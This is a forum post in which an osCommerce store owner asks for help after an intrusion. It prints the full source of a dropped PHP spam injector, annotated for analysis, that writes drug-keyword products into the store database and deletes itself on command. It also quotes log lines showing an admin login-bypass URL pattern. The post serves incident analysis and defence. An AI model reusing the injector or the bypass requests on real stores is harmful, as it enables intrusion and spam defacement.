
kenkenms

database got hack from Russian hacker


My osc database was hacked: links to drugs were put into our products. I found the script in the images folder, called 1dbdor.php:

 

<?php

 

// Analyst summary (top-level driver of the dropped script):
// reads keyword lines from $keysFile, builds one HTML description per keyword
// and writes each one into the store's product tables through insertDB().
// It uses the database constants that the two include files below are
// expected to define (those files are not shown on this page).
// Cleanup hint: every row written by insertDB() carries the fixed
// products_date_added value '1993-01-01 01:00:00'.
// NOTE(review): in the access log quoted after this listing, the POSTs to
// /admin/... (06:02:28-06:02:39) precede the first GET of this file
// (06:02:41), which suggests the file arrived through the admin tool - confirm
// against the full log. Restricting access to the admin directory and
// disabling PHP execution in images/ are the checks to make.

// Keep running after the client disconnects and lift the execution time limit.
ignore_user_abort(1);

set_time_limit(0);

 

// Paths are relative to this script's own directory (images/ per the post).
include "../includes/configure.php";

include "../includes/database_tables.php";

 

// Helper files kept next to the script: keyword input and generated-link output.
$keysFile = "1dballed.txt";

$linksFile = "1dblinks.txt";

 

// Self-removal switch: a request carrying d=1 deletes this script and both
// helper files, then stops. It never touches the database, so the inserted
// product rows remain after the files are gone.
if ($_REQUEST['d'] == '1') {

// NOTE(review): $HTTP_SERVER_VARS is a legacy array; where PHP does not
// populate it this unlink gets an empty path, which may leave the script on
// disk - confirm against the PHP version in use.
unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);

unlink($keysFile);

unlink($linksFile);

die ('deleted');

}

 

// Loop bound below: number of keyword lines processed (and rows inserted) per request.
$pageNum = 100;

 

// Min/max number of links AddLinks() appends to a page.
$linksMinMax = array (2,5);

// Min/max number of text fragments pageGen() emits per page.
$keysMinMax = array (20,40);

// Range from which pageGen() draws $percent.
$keycentMinMax = array (7,10);

// Upper bound of the random offset pageGen() applies to its step.
$stepmaxdif = 5;

// Decoded string is prepended to every generated description. The encoded
// literal was stripped from this copy of the post, so its content is unknown.
$addlink = base64_decode('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');

// Last delimiter chosen by randDel(); shared state across calls.
$lastkdel = "";

 

// Persistent connection using the store's own credential constants.
$link = mysql_pconnect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD) or die("Could not connect");

mysql_select_db(DB_DATABASE);

 

// One keyword per line; no check that the file exists.
$keysArr = file ($keysFile);

 

// Takes the first $pageNum lines by index, regardless of how many the file holds.
for ($i=0;$i<=$pageNum-1;$i++)

{

$key = $keysArr[$i];

//foreach ($keysArr as $key)

//{

$page = '';

$key = ucfirst(trim($key));

// Description = decoded prefix + keyword text + links to earlier injected pages.
$page = $addlink;

$page .= pageGen ($key);

$page .= AddLinks ();

// Writes the page as a new product; see insertDB() for the rows created.
insertDB ($key , $page);

//}

 

}

// Fixed marker string printed once the loop has finished.
echo '1DBDOR';

 

/**
 * Builds the keyword-stuffed body of one injected product description.
 *
 * The output starts with the keyword in an <h1>, followed by a random number
 * of fragments (count drawn from $keysMinMax). When $i is a multiple of the
 * current step the keyword itself is emitted inside a random tag (randtag);
 * otherwise a randomly chosen line of $keysArr is emitted. Each fragment gets
 * a random trailing delimiter from randDel().
 *
 * @param string $key keyword used as heading and repeated in the text
 * @return string generated HTML fragment
 */
function pageGen ($key)

{

global $keysMinMax , $keycentMinMax , $stepmaxdif , $keysArr;

 

// $i counts emitted fragments; $stepi counts keyword insertions.
$i=1;

$stepi = 1;

// Total number of fragments for this page.
$maxslov = rand ($keysMinMax[0],$keysMinMax[1]);

 

$percent = rand ($keycentMinMax[0],$keycentMinMax[1]);

 

// The (int) cast binds to the product only, so both results can be floats.
$mk = (int)($percent*$maxslov)/($percent+100) ;

// Base spacing between keyword insertions.
$srstep = (int)$maxslov/$mk ;

 

// First use of $addtopage; it is not initialised earlier in this function.
$addtopage .= '<h1>'.$key.'</h1>';

 

while ($i <= $maxslov)

{

// Odd insertions add a fresh random offset to the base step; even ones
// subtract the offset drawn on the previous odd pass.
if ($stepi % 2 != 0)

{

$stepdif = rand(0,$stepmaxdif);

$step = $srstep + $stepdif;

}

else

{

$step = $srstep - $stepdif;

}

 

// % operates on the integer-converted operands.
if ($i % $step == 0)

{

// Keyword position: emit the keyword wrapped in a random tag.
$tagkey = randtag($key);

$addtopage .= randDel($tagkey);

$i++;

$stepi++;

}

else

{

// Filler position: emit a random line from the keyword file.
$otherkey = rand(0, count($keysArr)-1);

$addtopage .= randDel(trim($keysArr[$otherkey]));

$i++;

}

 

}

return $addtopage;

}

 

/**
 * Appends a randomly chosen delimiter to a text fragment.
 *
 * The fragment is capitalised with ucfirst() when the delimiter chosen on the
 * previous call was '. ', '<br>' or '<br><br>'. The delimiter picked here is
 * stored in the global $lastkdel for the next call.
 *
 * @param string $key fragment to terminate
 * @return string fragment followed by the delimiter
 */
function randDel ($key)

{

global $lastkdel;

$dArr = array (' ' , ' ' , ', ' , '. ' , ' - ' , ': ' , '<br>', '<br><br>');

// array_rand() returns a random key (index) of $dArr.
$d = array_rand ($dArr);

if ($lastkdel == '. ' || $lastkdel == '<br>' || $lastkdel == '<br><br>')

{

$res = ucfirst($key) . $dArr[$d];

}

else

{

$res = $key.$dArr[$d];

}

// Remember the delimiter so the next fragment can be capitalised if needed.
$lastkdel = $dArr[$d];

return $res;

}

 

/**
 * Wraps a string in one randomly chosen pair of HTML tags.
 *
 * @param string $string text to wrap
 * @return string text enclosed in a matching opening and closing tag
 */
function randtag ($string)

{

 

// Parallel arrays: index $r selects an opening tag and its closing tag.
$st = array ( '<b>' , '<strong>' , '<i>' , '<em>' , '<blockquote>');

$et = array ('</b>', '</strong>', '</i>', '</em>' , '</blockquote>');

 

$r = rand (0 , count($st)-1);

 

return $st[$r] . $string . $et[$r];

}

 

/**
 * Picks a few random lines from $linksFile to append to a generated page.
 *
 * $linksFile is the file linkToFile() appends to, so these are anchors to
 * product pages the script inserted earlier: the injected pages link to each
 * other. Links are returned only when the file exists and holds more than
 * $linksMinMax[1]*2 lines; otherwise the function returns without a value.
 *
 * @return string|null joined link lines, or null when too few links exist
 */
function AddLinks ()

{

global $linksFile , $linksMinMax;

$addlinks = '';

$linksDel = array (', ' , ' | ' , '<br>');

$ldc = count($linksDel);

if (file_exists($linksFile))

{

$links = file ($linksFile);

$c = count ($links);

// Require a minimum pool of links before any are used.
if ($c > $linksMinMax[1]*2)

{

// Number of links to emit, and one separator used for the whole list.
$lmax = rand ($linksMinMax[0],$linksMinMax[1]);

$ldi = rand (0 , $ldc-1);

for ($i=0 ; $i < $lmax ; $i++ )

{

// First link has no separator in front; each pick is an independent random line.
$addlinks .= ($i == 0) ? ( trim($links[rand(0,$c-1)]) ) : ( $linksDel[$ldi] . trim($links[rand(0,$c-1)]) );

}

return $addlinks;

}

else

{

return ;

}

}

else

{

return ;

}

}

 

/**
 * Inserts one generated page into the store as a new product.
 *
 * Writes a row to TABLE_PRODUCTS with status '1' and the fixed date
 * '1993-01-01 01:00:00', then a row to TABLE_PRODUCTS_DESCRIPTION holding the
 * keyword as the name and the generated HTML as the description. The fixed
 * date is a usable marker when searching the database for injected rows.
 * Query results are not checked for failure.
 *
 * @param string $key   product name (the keyword)
 * @param string $descr product description (generated HTML)
 * @return void
 */
function insertDB ( $key , $descr )

{

 

$key = mysql_escape_string($key);

$descr = mysql_escape_string($descr);

 

// No products_id is supplied in either INSERT statement.
$r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS." (products_date_added,products_status) VALUES ('1993-01-01 01:00:00','1')" );

 

$r = mysql_query ("INSERT INTO ".TABLE_PRODUCTS_DESCRIPTION." (products_name,products_description) VALUES ('".$key."','".$descr."')" );

// The id read back here is used as products_id in the recorded link.
$r = mysql_query ("select last_insert_id()");

$pid = mysql_result ($r, 0, 0);

 

 

// Resolves to linkToFile(); PHP function names are case-insensitive.
LinkToFile ($pid , $key);

}

 

/**
 * Appends an HTML anchor for an inserted product to $linksFile.
 *
 * The URL is built from the HTTP_SERVER and DIR_WS_HTTP_CATALOG constants and
 * points at product_info.php with the given id. The access log on this page
 * shows the same client downloading 1dblinks.txt, so this file also serves as
 * a list of the injected product URLs.
 *
 * @param mixed  $id  value used as products_id in the URL
 * @param string $key anchor text (the keyword)
 * @return void
 */
function linkToFile ($id , $key)

{

global $linksFile;

$link = '<a href="' . HTTP_SERVER . DIR_WS_HTTP_CATALOG .'product_info.php?products_id=' . $id . '">' . $key . '</a>';

// Append mode: the file grows by one CRLF-terminated line per inserted product.
$fp = fopen ($linksFile , "a");

fputs ($fp , $link."\r\n");

fclose ($fp);

}

 

?>

 

I can't find how they were able to log in to my admin. Here is the log:

 

188.120.234.41 - - [05/Aug/2010:06:02:41 +0800] "GET /images/1dbdor.php HTTP/1.0" 200 181 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:51 +0800] "GET /images/1dblinks.txt HTTP/1.0" 200 9253 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:52 +0800] "GET /images/1dbdor.php?d=1 HTTP/1.0" 200 182 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:28 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:33 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:37 +0800] "POST /admin/banner_manager.php/login.php?action=insert HTTP/1.1" 200 18758 "-" "-"

188.120.234.41 - - [05/Aug/2010:06:02:39 +0800] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 16846 "-" "-"

 

Can anyone advise?

 

Regards

Dan
